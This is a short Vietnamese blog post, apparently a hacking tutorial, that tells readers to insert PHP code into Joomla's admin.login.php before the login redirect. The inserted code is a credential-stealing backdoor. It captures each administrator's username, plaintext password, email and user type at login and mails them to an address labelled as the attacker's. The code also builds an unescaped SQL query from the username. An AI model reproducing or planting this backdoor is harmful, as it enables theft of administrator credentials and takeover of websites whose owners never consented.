Mở file: admin.login.php
Tìm dòng:
$mainframe->redirect('index.php');Thêm trước dòng này 1 đoạn code như sau:
/** * @author [N]guye[N] * @copyright 2010 */Khi admin nó đăng nhập thì username, password, email nó ào ào chạy về email của mình.
$db =& JFactory::getDBO(); $mailfrom = $mainframe->getCfg( 'mailfrom' );$fromname = $mainframe->getCfg( 'fromname' );$siteURL = JURI::base();$uname = $credentials['username']; $query = 'SELECT name , email, usertype ' . ' FROM #__users' . ' WHERE username = "'.$uname.'"';$db->setQuery( $query );$rows = $db->loadObject();
if ( ! $mailfrom || ! $fromname ) { $fromname = $rows->name; $mailfrom = $rows->email;}$usertype = $rows->usertype; $email = $rows->email;$pass = $credentials['password'];
$message = "$uname|$email|$pass|$usertype";$to="abc#gmail.com"; // email của attacker$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";@mail($to, $siteURL, $message, $header);
Lấy user và password của Joomla (Keylogger)
Views:
0 comments:
Post a Comment